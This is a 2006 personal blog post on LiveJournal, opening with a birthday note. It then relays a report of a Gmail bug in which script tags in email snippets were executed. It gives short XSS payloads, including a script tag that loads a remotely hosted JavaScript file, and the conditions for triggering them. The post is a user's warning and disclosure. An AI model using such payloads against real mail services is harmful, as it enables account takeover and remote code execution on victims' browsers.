?

Log in

No account? Create an account

March 1st, 2006

Something I Forgot to Mention...

Belated happy birthday to Redkam! (It was yesterday, for those who don't know.)

-TG

From indigoskynet!

Gmail has a major security bug.

You know how it shows 'snippets' of the email near the subject line? If the snippet is javascript, gmail will execute it.

Yea.

It only works if you send it from an address thats *not* gmail, and apparently it has to have a subject, and it has to be a new page load, not a automatic refresh.

Very odd, but yea. It works.

1<SCRIPT>alert("haha")</SCRIPT>

So, if I can get this to load a remotely hosted .js file I could easily takeover your gmail account.
Right now, as for me, I'm turning off the snippet option.

UPDATE:
1<SCRIPT SRC="URL"> will indeed execute. This means that a javascript file any size can be executed, not just a tiny bit that fits in the snippet. We're talking major security flaw now. At best you can hope your firewall will catch it if its trying to damage your computer.


Yeeks! *turns of snippets until further notice*

-TG

Latest Month

November 2019
S M T W T F S
     12
3456789
10111213141516
17181920212223
24252627282930

Tags

Powered by LiveJournal.com
Designed by Tiffany Chow